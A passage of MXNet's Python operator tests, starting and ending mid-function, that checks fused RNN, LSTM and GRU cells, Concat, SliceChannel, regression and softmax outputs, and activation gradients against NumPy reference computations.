    dy = mx.random.uniform(shape=mod1.get_outputs()[0].shape)
    mod1.backward(out_grads=[dy])
    mod2.backward(out_grads=[dy])
    if grad_req != 'null':
        assert_allclose(mod1.get_input_grads()[0].asnumpy(), mod2.get_input_grads()[0].asnumpy(), rtol=rtol, atol=atol)
    else:
        # With grad_req='null' no input gradient may be produced at all.
        assert(mod1.get_input_grads()[0] == None)
        assert(mod2.get_input_grads()[0] == None)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_sym():
    """Fused 3-layer LSTM vs a stack of unfused LSTMCells."""
    T, N, I, H = 5, 32, 800, 800
    fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='lstm', get_next_state=True, prefix='')
    stack = mx.rnn.SequentialRNNCell()
    for layer in range(3):
        stack.add(mx.rnn.LSTMCell(H, prefix='l%d_' % layer))
    for grad_req in ('write', 'add', 'null'):
        check_rnn_consistency(fused, stack, T, N, I, H, grad_req)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_bidirectional():
    """Fused bidirectional 2-layer LSTM vs stacked BidirectionalCells."""
    T, N, I, H = 5, 20, 800, 800
    fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='lstm',
                                bidirectional=True, get_next_state=True, prefix='')
    stack = mx.rnn.SequentialRNNCell()
    for layer in range(2):
        stack.add(mx.rnn.BidirectionalCell(
            mx.rnn.LSTMCell(H, prefix='l%d_' % layer),
            mx.rnn.LSTMCell(H, prefix='r%d_' % layer),
            output_prefix='bi_lstm_%d_' % layer))
    for grad_req in ('write', 'add', 'null'):
        check_rnn_consistency(fused, stack, T, N, I, H, grad_req)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_sym():
    """Fused 3-layer GRU vs a stack of unfused GRUCells."""
    T, N, I, H = 5, 32, 800, 800
    fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='gru', get_next_state=True, prefix='')
    stack = mx.rnn.SequentialRNNCell()
    for layer in range(3):
        stack.add(mx.rnn.GRUCell(H, prefix='l%d_' % layer))
    for grad_req in ('write', 'add', 'null'):
        check_rnn_consistency(fused, stack, T, N, I, H, grad_req)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_bidirectional():
    """Fused bidirectional 2-layer GRU vs stacked BidirectionalCells."""
    T, N, I, H = 5, 20, 800, 800
    fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='gru',
                                bidirectional=True, get_next_state=True, prefix='')
    stack = mx.rnn.SequentialRNNCell()
    for layer in range(2):
        stack.add(mx.rnn.BidirectionalCell(
            mx.rnn.GRUCell(H, prefix='l%d_' % layer),
            mx.rnn.GRUCell(H, prefix='r%d_' % layer),
            output_prefix='bi_gru_%d_' % layer))
    for grad_req in ('write', 'add', 'null'):
        check_rnn_consistency(fused, stack, T, N, I, H, grad_req)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_sym():
    """Fused 3-layer vanilla RNN (tanh) vs a stack of unfused RNNCells."""
    T, N, I, H = 5, 32, 800, 800
    fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_tanh', get_next_state=True, prefix='')
    stack = mx.rnn.SequentialRNNCell()
    for layer in range(3):
        stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l%d_' % layer))
    for grad_req in ('write', 'add', 'null'):
        check_rnn_consistency(fused, stack, T, N, I, H, grad_req)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_bidirectional():
    """Fused bidirectional 2-layer RNN (tanh) vs stacked BidirectionalCells."""
    T, N, I, H = 5, 20, 800, 800
    fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_tanh',
                                bidirectional=True, get_next_state=True, prefix='')
    stack = mx.rnn.SequentialRNNCell()
    for layer in range(2):
        stack.add(mx.rnn.BidirectionalCell(
            mx.rnn.RNNCell(H, activation='tanh', prefix='l%d_' % layer),
            mx.rnn.RNNCell(H, activation='tanh', prefix='r%d_' % layer),
            output_prefix='bi_rnntanh_%d_' % layer))
    for grad_req in ('write', 'add', 'null'):
        check_rnn_consistency(fused, stack, T, N, I, H, grad_req)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_sym():
    """Fused 3-layer vanilla RNN (relu) vs a stack of unfused RNNCells."""
    T, N, I, H = 5, 32, 200, 200
    fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_relu', get_next_state=True, prefix='')
    stack = mx.rnn.SequentialRNNCell()
    for layer in range(3):
        stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l%d_' % layer))
    for grad_req in ('write', 'add', 'null'):
        check_rnn_consistency(fused, stack, T, N, I, H, grad_req)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_bidirectional():
    """Fused bidirectional 2-layer RNN (relu) vs stacked BidirectionalCells.

    Uses a looser tolerance than the tanh variant since relu activations
    amplify differences.
    """
    T, N, I, H = 5, 20, 200, 200
    fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_relu',
                                bidirectional=True, get_next_state=True, prefix='')
    stack = mx.rnn.SequentialRNNCell()
    for layer in range(2):
        stack.add(mx.rnn.BidirectionalCell(
            mx.rnn.RNNCell(H, activation='relu', prefix='l%d_' % layer),
            mx.rnn.RNNCell(H, activation='relu', prefix='r%d_' % layer),
            output_prefix='bi_rnnrelu_%d_' % layer))
    for grad_req in ('write', 'add', 'null'):
        check_rnn_consistency(fused, stack, T, N, I, H, grad_req, rtol=1e-2, atol=1e-2)
@with_seed()
def test_lstm_dropout():
    """Smoke test: 5-layer fused LSTM with dropout p=0.5 runs forward on CPU."""
    data_sym = mx.sym.Variable('x')
    params_sym = mx.sym.Variable('params')
    state_sym = mx.sym.Variable('state')
    cell_sym = mx.sym.Variable('state_cell')
    T, N, I, H = 300, 20, 800, 800
    rnn = mx.sym.RNN(data=data_sym, parameters=params_sym, state=state_sym, state_cell=cell_sym,
                     state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
    executor = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
    outputs = executor.forward(is_train=True)
    outputs[0].wait_to_read()
@with_seed()
def test_gru_dropout():
    """Smoke test: 5-layer fused GRU with dropout p=0.5 runs forward on CPU."""
    data_sym = mx.sym.Variable('x')
    params_sym = mx.sym.Variable('params')
    state_sym = mx.sym.Variable('state')
    T, N, I, H = 300, 20, 800, 800
    rnn = mx.sym.RNN(data=data_sym, parameters=params_sym, state=state_sym,
                     state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
    executor = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
    outputs = executor.forward(is_train=True)
    outputs[0].wait_to_read()
@with_seed()
def test_rnntanh_dropout():
    """Smoke test: 5-layer fused tanh RNN with dropout p=0.5 runs forward."""
    data_sym = mx.sym.Variable('x')
    params_sym = mx.sym.Variable('params')
    state_sym = mx.sym.Variable('state')
    T, N, I, H = 300, 20, 800, 800
    rnn = mx.sym.RNN(data=data_sym, parameters=params_sym, state=state_sym,
                     state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
    executor = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
    outputs = executor.forward(is_train=True)
    outputs[0].wait_to_read()
@with_seed()
def test_rnnrelu_dropout():
    """Smoke test: 5-layer fused relu RNN with dropout p=0.5 runs forward."""
    data_sym = mx.sym.Variable('x')
    params_sym = mx.sym.Variable('params')
    state_sym = mx.sym.Variable('state')
    T, N, I, H = 300, 20, 800, 800
    rnn = mx.sym.RNN(data=data_sym, parameters=params_sym, state=state_sym,
                     state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
    executor = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
    outputs = executor.forward(is_train=True)
    outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
    """NumPy reference softmax along *axis* with an optional temperature."""
    # Subtract the per-slice max for numerical stability; the result of
    # softmax is invariant under this shift.
    shifted = x - np.max(x, axis=axis, keepdims=True)
    exps = np.exp(shifted / temperature)
    return exps / np.sum(exps, axis=axis, keepdims=True)
def check_elementwise_sum_with_shape(shape, n):
    """Forward/backward check of ElementWiseSum with *n* inputs of *shape*.

    Forward must equal the numpy sum of the inputs; backward must copy the
    output gradient into every input gradient (d(sum)/d(input_i) == 1).
    """
    # forward
    inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
    out = mx.symbol.ElementWiseSum(*inputs, name='esum')
    arr = [mx.nd.empty(shape) for i in range(n)]
    arr_grad = [mx.nd.empty(shape) for i in range(n)]
    for i in range(n):
        arr[i][:] = np.random.uniform(-10, 10, shape)
    exec1 = out.bind(default_context(),
                     args=arr,
                     args_grad=arr_grad)
    # BUG FIX: the original read exec1.outputs[0] here, BEFORE forward(),
    # into a variable that was immediately overwritten — dead code removed.
    exec1.forward(is_train=True)
    out1 = exec1.outputs[0].asnumpy()
    out = sum(a.asnumpy() for a in arr)
    assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)

    out_grad = mx.nd.empty(shape)
    out_grad[:] = np.random.uniform(-10, 10, shape)
    # backward
    exec1.backward([out_grad])
    for a in arr_grad:
        assert_almost_equal(a.asnumpy(), out_grad.asnumpy(), rtol=1e-5, atol=1e-5)
@with_seed()
def test_elementwise_sum():
    """ElementWiseSum over random 1-3 dim shapes and random input counts."""
    for _ in range(2):
        for ndim in range(1, 4):
            # Cap each dimension so the total volume stays near 1000 elements.
            shape = tuple(np.random.randint(1, int(1000**(1.0/ndim)), size=ndim))
            check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
    """Forward/backward check of Concat along *dimension* for *shapes*.

    Each input i is filled with the constant shapes[i][dimension], the
    forward result is compared against np.concatenate, and backward checks
    that every (non-skipped) input gradient equals its slice of the output
    gradient, which is set to output + 1.
    """
    # if skip_second is True, second argument will not have gradient.
    # it is to test #1130
    n = len(shapes)
    # forward
    target_dim = 0
    for shape in shapes:
        target_dim += shape[dimension]

    inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
    out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
    arr = [mx.nd.empty(shape) for shape in shapes]
    for i in range(n):
        # Fill input i with a constant so its slice is identifiable.
        arr[i][:] = shapes[i][dimension]
    arr_np = [np.copy(narray.asnumpy()) for narray in arr]
    arr_grad = [mx.nd.empty(shape) for shape in shapes]
    dict_grad = {}
    arg_names = out.list_arguments()

    # Optionally omit 'arg1' from the gradient dict (regression test #1130).
    for name, g in zip(arg_names, arr_grad):
        if not skip_second or name != 'arg1':
            dict_grad[name] = g

    args = out.list_arguments()
    arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
    out_grad = mx.nd.empty(out_shapes[0])
    exec1 = out.bind(default_context(),
                     args=arr,
                     args_grad=dict_grad)
    exec1.forward(is_train=True)
    out1 = exec1.outputs[0]
    ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
    assert_almost_equal(out1.asnumpy(), ret)

    # backward: the gradient of concat is a slice of the output gradient,
    # which here is forward-output + 1, i.e. each original input + 1.
    out1.copyto(out_grad)
    out_grad[:] += 1
    exec1.backward([out_grad])
    for i, name in enumerate(arg_names):
        if not skip_second or name != 'arg1':
            grad = dict_grad[name]
            np_grad = arr_np[i]
            assert_almost_equal(grad.asnumpy(), np_grad + 1)
@with_seed()
def test_concat():
    """Concat over 2D/3D/4D inputs along every valid axis, positive and
    negative, with 2..5 inputs, both with and without a gradient for the
    second input (skip_second)."""
    for dimension in range(4):
        n = 2  # NOTE(review): unused
        merge = [2, 3, 4, 5, 6]  # sizes along the concatenated axis
        a = 2
        b = 3
        c = 4
        # test 2D
        if dimension<2:
            for dim in range(2, 6):
                shapes = []
                for i in range(dim):
                    if dimension == 0:
                        shapes.append((merge[i], a))
                    elif dimension == 1:
                        shapes.append((a, merge[i]))
                check_concat_with_shape(shapes,dimension,True)
                check_concat_with_shape(shapes,dimension,False)
                # Test negative dim
                check_concat_with_shape(shapes, dimension - 2, True)
                check_concat_with_shape(shapes, dimension - 2, False)
        #test 3D
        if dimension<3:
            for dim in range(2, 6):
                shapes = []
                for i in range(dim):
                    if dimension == 0:
                        shapes.append((merge[i], a,b))
                    elif dimension ==1:
                        shapes.append((a,merge[i],b))
                    elif dimension ==2:
                        shapes.append((a,b,merge[i]))
                check_concat_with_shape(shapes,dimension,True)
                check_concat_with_shape(shapes,dimension,False)
                # Test negative dim
                check_concat_with_shape(shapes, dimension - 3, True)
                check_concat_with_shape(shapes, dimension - 3, False)
        # test 4D
        for dim in range(2, 6):
            shapes = []
            for i in range(dim):
                if dimension == 0:
                    shapes.append((merge[i],a,b,c))
                elif dimension == 1:
                    shapes.append((a,merge[i],b,c))
                elif dimension ==2:
                    shapes.append((a,b,merge[i],c))
                elif dimension ==3:
                    shapes.append((a,b,c,merge[i]))
            check_concat_with_shape(shapes,dimension,True)
            check_concat_with_shape(shapes,dimension,False)
            # Test negative dim
            check_concat_with_shape(shapes, dimension - 4, True)
            check_concat_with_shape(shapes, dimension - 4, False)
@with_seed()
def test_slice_channel():
    """SliceChannel (split) forward/backward, with and without squeeze_axis."""
    def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
        ins = []
        if squeeze_axis:
            # The split axis has exactly num_outputs elements, so each
            # output drops that axis entirely.
            shape = np.random.randint(2, 5, data_ndim).tolist()
            shape[axis] = num_outputs
            out_ele_shape = [ele for ele in shape]
            del out_ele_shape[axis]
        else:
            # The split axis is a multiple of num_outputs; each output
            # keeps a 1/num_outputs slice of it.
            shape = np.random.randint(1, 5, data_ndim).tolist()
            shape[axis] *= num_outputs
            out_ele_shape = [ele for ele in shape]
            out_ele_shape[axis] //= num_outputs
        data_npy = np.random.normal(size=shape)
        out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
        data = mx.sym.Variable('data')
        sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
        exe = sym.simple_bind(ctx=default_context(), data=data_npy.shape)
        assert len(exe.outputs) == num_outputs
        outputs = exe.forward(is_train=True, data=data_npy)
        for i in range(num_outputs):
            # Ground truth: the i-th contiguous slice along the split axis.
            gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
                                         (i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
            if squeeze_axis:
                assert_almost_equal(outputs[i].asnumpy(), gt.reshape(outputs[i].shape))
            else:
                assert_almost_equal(outputs[i].asnumpy(), gt)
        # test backward: the gradient of split is the concatenation of the
        # per-output gradients along the split axis.
        exe.backward(out_grads=[mx.nd.array(ele, ctx=default_context()) for ele in out_grads_npy])
        if squeeze_axis:
            assert_almost_equal(exe.grad_arrays[0].asnumpy(),
                                np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
                                               axis=axis))
        else:
            assert_almost_equal(exe.grad_arrays[0].asnumpy(),
                                np.concatenate(out_grads_npy, axis=axis))
    check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
    check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
    check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
    check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
@with_seed()
def test_regression():
    ''' test regression operator '''
    def check_regression(symbol, forward, backward, shape, stype='default', densities=[0, 0.5, 1]):
        # Compare a regression output symbol against numpy references:
        # *forward* maps data -> prediction, *backward* maps
        # (prediction, label) -> gradient.  Labels are drawn at several
        # sparsity densities so both dense and csr label storage are hit.
        # init executor
        data = mx.symbol.Variable('data')
        label = mx.symbol.Variable('label', stype=stype)
        out = symbol(data, label)
        grad_req = {'data': 'write', 'label': 'null'}
        out_exec = out.simple_bind(default_context(), grad_req=grad_req,
                                   data=shape, label=shape)
        arg_map = dict(zip(out.list_arguments(), out_exec.arg_arrays))
        grad_map = dict(zip(out.list_arguments(), out_exec.grad_arrays))
        # init data
        arr_data = mx.random.uniform(-1, 1, shape)
        arg_map["data"][:] = arr_data
        # init label based on density
        arr_label = arg_map["label"]
        atol = 1e-5
        for density in densities:
            arr_label[:] = rand_ndarray(shape, stype, density=density)
            out_exec.forward(is_train=True)
            out_exec.backward()
            np_out = forward(arr_data.asnumpy())
            # The operator normalizes the gradient by the feature dimension.
            out_grad = backward(np_out, arr_label.asnumpy().reshape(np_out.shape)) / shape[1]
            assert_almost_equal(out_exec.outputs[0].asnumpy(), np_out, atol=atol)
            assert_almost_equal(grad_map["data"].asnumpy(), out_grad, atol=atol)

    shape = (50, 30)

    # Logistic: sigmoid forward, (pred - label) gradient.
    check_regression(mx.symbol.LogisticRegressionOutput,
                     lambda x: 1.0 / (1.0 + np.exp(-x)),
                     lambda x, y : x - y,
                     shape)
    # Linear: identity forward, (pred - label) gradient.
    check_regression(mx.symbol.LinearRegressionOutput,
                     lambda x: x,
                     lambda x, y : x - y,
                     shape)
    # MAE: identity forward, sign(pred - label) gradient.
    check_regression(mx.symbol.MAERegressionOutput,
                     lambda x: x,
                     lambda x, y : np.where(x > y, np.ones(x.shape), -np.ones(x.shape)),
                     shape)
    # Same checks with sparse (csr) labels.
    check_regression(mx.symbol.LogisticRegressionOutput,
                     lambda x: 1.0 / (1.0 + np.exp(-x)),
                     lambda x, y : x - y,
                     shape, stype='csr')
    check_regression(mx.symbol.LinearRegressionOutput,
                     lambda x: x,
                     lambda x, y : x - y,
                     shape, stype='csr')
def check_softmax_grad(xpu):
    """SoftmaxOutput forward/backward against hand-computed values."""
    data_sym = mx.sym.Variable('x')
    label_sym = mx.sym.Variable('label')
    data_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
    data_grad = mx.nd.zeros((1,4), ctx=xpu)
    label_nd = mx.nd.array([1], ctx=xpu)

    net = mx.sym.SoftmaxOutput(data=data_sym, label=label_sym, ignore_label=0, use_ignore=False)
    executor = net.bind(ctx=xpu, args={'x': data_nd, 'label': label_nd},
                        args_grad={'x': data_grad})

    executor.forward(is_train=True)
    probs = executor.outputs[0].asnumpy()
    expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
    assert np.isclose(probs, expected_softmax_out).all()

    executor.backward(is_train=True)
    dlogits = executor.grad_arrays[0].asnumpy()
    target = int(label_nd[0].asscalar())
    # Cross-entropy gradient wrt logits is softmax(x) - onehot(label),
    # so (grad - softmax) should be -1 at the target and 0 elsewhere.
    expected_grad_out = np.zeros((1,4))
    expected_grad_out[0, target] = -1
    assert np.isclose(dlogits - probs, expected_grad_out).all()
def check_smoothed_softmax_grad(xpu):
    """SoftmaxOutput with label smoothing (smooth_alpha) gradient check."""
    alpha = 0.2
    data_sym = mx.sym.Variable('x')
    label_sym = mx.sym.Variable('label')
    data_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
    data_grad = mx.nd.zeros((1,4), ctx=xpu)
    label_nd = mx.nd.array([1], ctx=xpu)

    net = mx.sym.SoftmaxOutput(data=data_sym, label=label_sym, ignore_label=0,
                               use_ignore=False, smooth_alpha=alpha)
    executor = net.bind(ctx=xpu, args={'x': data_nd, 'label': label_nd},
                        args_grad={'x': data_grad})

    executor.forward(is_train=True)
    probs = executor.outputs[0].asnumpy()
    expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
    assert np.isclose(probs, expected_softmax_out).all()

    executor.backward(is_train=True)
    dlogits = executor.grad_arrays[0].asnumpy()
    target = int(label_nd[0].asscalar())
    # With smoothing the soft label puts (1 - alpha) on the target class
    # and alpha/(K-1) on each of the other K-1 classes.
    expected_grad_out = np.full((1,4), fill_value=-alpha/float(4-1))
    expected_grad_out[0, target] = - (1 - alpha)
    assert np.isclose(dlogits - probs, expected_grad_out).all()
def check_softmax_with_ignore_label(xpu):
    """SoftmaxOutput with use_ignore: rows whose label equals ignore_label
    (0) must receive zero gradient, and the other rows must be unchanged."""
    X = mx.symbol.Variable('X')
    L = mx.symbol.Variable('L')
    Y = mx.symbol.SoftmaxOutput(data=X, label=L, ignore_label=0, use_ignore=True)

    shape = (20, 10)
    x = mx.nd.empty(shape, ctx = xpu)
    l = mx.nd.empty((shape[0],), ctx = xpu)
    x_np = np.random.rand(*shape)
    # Labels in [0, shape[1]-2]; 0 (the ignore label) can occur here too,
    # this pass is just the baseline gradient.
    l_np = np.random.randint(0, shape[1]-1, (shape[0],))
    x[:] = x_np
    l[:] = l_np

    grad = mx.nd.empty(shape, ctx = xpu)
    exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
    exec1.forward(is_train=True)
    exec1.backward()
    grad0 = grad.asnumpy()

    # Set the first half of the labels to the ignore label and rerun.
    for i in range(int(shape[0]/2)):
        l_np[i] = 0
    l[:] = l_np
    exec1.forward(is_train=True)
    exec1.backward()
    grad1 = grad.asnumpy()

    # Ignored rows get (near) zero gradient; the other rows are unaffected.
    assert abs(np.sum(grad1[:int(shape[0]/2)])) < 1e-5
    assert_almost_equal(grad0[int(shape[0]/2):], grad1[int(shape[0]/2):])
def check_softmax_with_shape(shape, xpu, preserve_shape=False):
    """SoftmaxOutput vs the numpy reference for an arbitrary shape.

    The label is itself a softmax distribution (soft labels), so the
    expected input gradient is softmax(x) - label.
    """
    # bind with label
    X = mx.symbol.Variable('X')
    L = mx.symbol.Variable('L')
    Y = mx.symbol.SoftmaxOutput(data=X, label=L, preserve_shape=preserve_shape)
    x = mx.random.uniform(-1, 1, shape, ctx=xpu)
    l = mx.random.uniform(-1, 1, shape, ctx=xpu)
    # Normalize the label into a probability distribution.
    l[:] = np_softmax(l.asnumpy())
    grad = mx.nd.empty(shape, ctx = xpu)
    exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
    exec1.forward(is_train=True)
    out = exec1.outputs[0].asnumpy()
    # Non-zero atol required by test_softmax with seed 781663739
    rtol = 1e-4
    atol = 1e-6
    assert_almost_equal(out, np_softmax(x.asnumpy()), rtol=rtol, atol=atol)
    exec1.backward()
    assert_almost_equal(grad.asnumpy(), np_softmax(x.asnumpy()) - l.asnumpy(), rtol=rtol, atol=atol)
def test_python_op():
    """NumpyOp pass-through: forward copies the input, backward copies dy."""
    X = mx.symbol.Variable('X')
    op = mx.operator.NumpyOp()
    sym = op.get_symbol(X, name='numpy_op')

    x = mx.ndarray.ones((10))*10
    dx = mx.ndarray.zeros((10))
    dy = mx.ndarray.ones((10))
    executor = sym.bind(default_context(), args=[x], args_grad={'X': dx})
    executor.forward(is_train=True)
    assert_almost_equal(x.asnumpy(), executor.outputs[0].asnumpy())
    executor.backward(dy)
    assert_almost_equal(dy.asnumpy(), dx.asnumpy())
def test_swapaxes():
    """Chained SwapAxis(0,2) then SwapAxis(1,2) must match numpy.swapaxes."""
    data = mx.symbol.Variable('data')
    shape = (2, 3, 4)
    x_np = np.ones(shape)
    x_np[0] = 1
    x_np[1] = 2
    x_nd = mx.nd.array(x_np)

    first_swap = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
    second_swap = mx.symbol.SwapAxis(data=first_swap, dim1=1, dim2=2)
    executor = second_swap.bind(default_context(), args=[x_nd])
    executor.forward(is_train=True)
    result = executor.outputs[0].asnumpy()

    expected = np.swapaxes(np.swapaxes(x_np, 0, 2), 1, 2)
    assert_almost_equal(result, expected)
@with_seed()
def test_scalarop():
    """Composite scalar arithmetic on a symbol, verified against numpy.

    Builds 2 / (4 - ((1+x+1)*2/5) - 0.8 - (x != 0)) symbolically and checks
    both the forward value and the chain-rule gradient with an incoming
    gradient of 2.
    """
    data = mx.symbol.Variable('data')
    shape = (3, 4)
    data_tmp = np.ones(shape)*5
    arr_data = mx.nd.array(data_tmp)
    arr_grad = mx.nd.empty(shape)
    arr_grad[:]=3

    test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))

    npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
    npout = 2/npout_1
    check_symbolic_forward(test, [data_tmp], [npout])

    # Inner derivative of the denominator wrt x is -2/5; for 2/u the grad is
    # -2*u'/u^2, scaled by the incoming gradient of 2.
    npout_grad = 2.*2/5
    npout_grad = 2*npout_grad /(npout_1 *npout_1 )
    check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
@with_seed()
def test_scalar_pow():
    """x**2: forward is the square, gradient is 2x."""
    data = mx.symbol.Variable('data')
    shape = (1, 1)
    ones = np.ones(shape)
    square = data ** 2
    check_numeric_gradient(square, [ones])
    check_symbolic_forward(square, [ones], [ones ** 2])
    check_symbolic_backward(square, [ones], [np.ones(shape)], [2 * ones])
@with_seed()
def test_symbol_pow():
    """base**exp: forward plus both partial derivatives."""
    shape = (1, 1)
    base_sym = mx.symbol.Variable('data')
    base = np.ones(shape)*2
    exp_sym = mx.symbol.Variable('exp')
    exponent = np.ones(shape)*3
    test = base_sym**exp_sym
    check_numeric_gradient(test, [base, exponent])
    check_symbolic_forward(test, [base, exponent], [base**exponent])
    # d/d(base) = exp * base**(exp-1);  d/d(exp) = base**exp * ln(base)
    d_base = base**(exponent - 1) * exponent
    d_exp = base**(exponent) * np.log(base)
    check_symbolic_backward(test, [base, exponent], [np.ones(shape)], [d_base, d_exp])
@with_seed()
def test_fully_connected():
    """FullyConnected forward vs numpy dot product, plus a numeric gradient
    check.  The (5, 5, 5, 13) input is flattened to (5, 325) to match the
    (10, 325) weight for num_hidden=10."""
    data = mx.sym.var("data")
    fc_weight = mx.sym.var("weight")
    fc_bias = mx.sym.var("bias")
    fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
    data = mx.nd.random.uniform(shape=(5, 5, 5, 13), dtype=np.float32)
    fc_weight = mx.nd.random.uniform(shape=(10, 325), dtype=np.float32)
    fc_bias = mx.nd.random.uniform(shape=(10), dtype=np.float32)
    fc_bias2 = mx.nd.random.uniform(shape=(10, 1), dtype=np.float32)
    data_np = data.asnumpy().reshape(5, 325)
    fc_weight_np = np.transpose(fc_weight.asnumpy())
    fc_bias_np = fc_bias.asnumpy()
    # Reference: y = x . W^T + b
    res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
    check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
    check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np},
                           numeric_eps=1e-2, rtol=1e-4, atol=1e-2)
    # TODO: Fix Bug #15032 when bias has ndim > 1
    #check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
@with_seed()
def test_pow_fn():
    """mx.sym.pow and mx.sym.power: 2**x forward, log(2)*2**x backward."""
    shape = (3, 4)
    exp = mx.symbol.Variable("exp")
    x = np.ones(shape)*3
    expected = 2**x
    for sym in (mx.sym.pow(2, exp), mx.sym.power(2, exp)):
        check_numeric_gradient(sym, [x], numeric_eps=1E-3)
        check_symbolic_forward(sym, [x], [expected])
        check_symbolic_backward(sym, [x], [np.ones(shape)], [np.log(2) * expected])
@with_seed()
def test_relu():
    """relu forward = max(x, 0); gradient = 1 for x > 0 else 0."""
    def relu_ref(values):
        return np.maximum(values, 0.0)

    def relu_grad_ref(values):
        return 1.0 * (values > 0.0)

    shape = (3, 4)
    x = mx.symbol.Variable("x")
    y = mx.sym.relu(x)
    xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
    eps = 1e-4
    # Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
    # Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
    xa[abs(xa) < eps] = 1.0
    check_numeric_gradient(y, [xa], numeric_eps=eps)
    check_symbolic_forward(y, [xa], [relu_ref(xa)])
    check_symbolic_backward(y, [xa], [np.ones(shape)], [relu_grad_ref(xa)])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_leaky_relu():
    """LeakyReLU in 'elu' and 'leaky' modes vs numpy references, across
    1-3 dims and float16/32/64 (numeric gradient skipped for float16)."""
    def fleaky_relu(x, act_type, slope=0.25):
        neg_indices = x < 0
        out = x.copy()
        if act_type == 'elu':
            out[neg_indices] = slope * np.expm1(out[neg_indices])
        elif act_type == 'leaky':
            out[neg_indices] = slope * out[neg_indices]
        return out
    def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
        neg_indices = x < 0
        out = np.ones(x.shape)
        if act_type == 'elu':
            # d/dx slope*(e^x - 1) = slope*e^x = y + slope for x < 0
            out[neg_indices] = y[neg_indices] + slope
        elif act_type == 'leaky':
            out[neg_indices] = slope
        return out * grad
    for ndim in range(1, 4):
        shape = rand_shape_nd(ndim)
        x = mx.symbol.Variable("x")
        slp = 0.25
        for dtype in [np.float16, np.float32, np.float64]:
            xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
            eps = 1e-4
            rtol = 1e-2
            atol = 1e-3
            # Avoid the gradient discontinuity at the origin.
            xa[abs(xa) < eps] = 1.0
            for act_type in ['elu', 'leaky']:
                y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
                ya = fleaky_relu(xa, slope=slp, act_type=act_type)
                ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
